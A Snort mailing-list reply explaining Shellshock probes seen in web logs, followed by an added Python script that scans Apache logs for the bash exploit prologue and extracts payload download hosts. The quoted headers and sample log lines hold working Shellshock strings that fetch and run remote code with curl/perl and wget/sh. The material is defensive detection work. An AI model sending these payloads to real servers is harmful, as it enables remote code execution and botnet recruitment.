Snort mailing list archives
Re: Odd http requests in the logs
From: waldo kitty <wkitty42 () windstream net>
Date: Mon, 03 Nov 2014 14:15:21 -0500
On 11/2/2014 11:23 PM, Richard Geddes wrote:
> Hello, I received a few (9) events in my web logs with the following fields:
>
> agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"
> referrer : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"

these are shellshock attempts... they are trying to use a macro hole in the bash command interpreter...

> downloaded index.png, and it turns out to be a base64 encoded perl script that has comments about a botnet. It seems to target apache.

yes, that script is a "2nd phase" that's only operational if the shellshock bypass attempt works... it also requires curl and perl to be installed and operational... curl for the retrieval and perl for the botnet script execution...

> I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense, snort, and the snort rules are up-to-date

do you have the shellshock detection rules enabled?

> snort seems to be passing these requests on to my web server, and it seems to me they should be blocked.

does the pfsense installation of snort operate as IDS (intrusion detection system) or IPS (intrusion protection system)? in either case, if the rules are not enabled to detect this problem, snort won't react to traffic that matches...

> I don't know enough about how web servers and log handlers process this data to determine if it's a threat.

the way it works is if those fields are processed by a bash CLI session... they create a macro that bash doesn't properly handle and it executes the commands after the semi-colon ";"... that's the bug... bash should stop processing the macro when it sees the semi-colon... if you are running a *nix OS, you should have already gotten several security updates fixing this problem...

> Is there a way to tell snort to block http requests with these fields? The source of the malicious file should probably be regex'd in case there are alternate sources of this file.

blocking depends on your installation and its capabilities...

-- 
NOTE: No off-list assistance is given without prior approval.
      Please *keep mailing list traffic on the list* unless
      private contact is specifically requested and granted.
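Added example (not part of the thread, and not Snort's or pfSense's own code): a small Python scanner that applies the check described above to Apache combined-format access logs. It looks for the `() { ...; };` function prologue in the User-Agent and Referer fields, which mod_cgi copies into the environment as HTTP_USER_AGENT and HTTP_REFERER before running a script, and pulls out the URLs and hosts the injected command tries to fetch from, so they can be fed to an egress blocklist or a custom IDS rule. The sample log lines are constructed; only the download URL and its host come from the headers quoted in the thread, and the source addresses, timestamps and the wget variant are made up for illustration.

```python
"""Scan Apache combined-format access logs for Shellshock (CVE-2014-6271) probes.

The bug: bash imported a function definition of the form "() { ...; }" from an
environment variable and kept executing whatever followed the closing brace.
mod_cgi exports User-Agent and Referer as HTTP_USER_AGENT / HTTP_REFERER before
running a CGI script, so a payload in those headers reaches bash.
"""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The prologue bash mis-parsed: "() {", a body, "}" and a ";" after which the
# injected commands begin. Whitespace is optional in the wild ("() { :;};").
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;(?P<cmd>.*)')

# URLs inside the injected command, stopping at shell metacharacters.
URL_RE = re.compile(r'https?://[^\s|;&\'"<>]+')

# Constructed sample log lines (see lead-in); the URL in the first is the one from the thread.
SAMPLE_LOGS = [
    '198.51.100.7 - - [02/Nov/2014:23:11:02 -0500] "GET /cgi-bin/test.cgi HTTP/1.1" 200 612 '
    '"() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" '
    '"() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"',
    # Ordinary browser request: must not be flagged.
    '203.0.113.5 - - [02/Nov/2014:23:12:44 -0500] "GET /index.html HTTP/1.1" 200 4821 '
    '"http://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/33.0"',
    # Variant without spaces, wget instead of curl, User-Agent only (constructed).
    '192.0.2.9 - - [02/Nov/2014:23:15:17 -0500] "GET /cgi-bin/status HTTP/1.0" 404 281 '
    '"-" "() { :;}; /usr/bin/wget -O /tmp/x http://203.0.113.77/x.sh; sh /tmp/x"',
]


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into named fields; raise on anything else."""
    m = COMBINED_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a combined-format log line: {line!r}")
    return m.groupdict()


def find_shellshock(entry: Dict[str, str]) -> List[Dict[str, object]]:
    """Return one finding per header field (agent, referer) that carries a payload."""
    findings = []
    for field in ("agent", "referer"):
        m = SHELLSHOCK_RE.search(entry[field])
        if not m:
            continue
        cmd = m.group("cmd").strip()
        urls = URL_RE.findall(cmd)
        findings.append({
            "src": entry["src"],
            "field": field,
            "command": cmd,
            "urls": urls,
            "hosts": sorted({urlparse(u).hostname for u in urls}),
        })
    return findings


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run find_shellshock over every line; findings keep log order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        findings.extend(find_shellshock(parse_line(line)))
    return findings


def blocklist(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct hosts the payloads fetch from: candidates for an egress block or IDS rule."""
    hosts = set()
    for f in findings:
        hosts.update(f["hosts"])
    return sorted(hosts)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOGS)
    for f in results:
        print(f"{f['src']:15} {f['field']:8} {f['command']}")
    print("hosts to block:", ", ".join(blocklist(results)))
```

The match on the `() {` prologue rather than on a specific fetch host is deliberate: as Richard notes, the download source changes between campaigns, so the regex keys on the bash trigger and treats the hosts it extracts as output, not as the detection criterion.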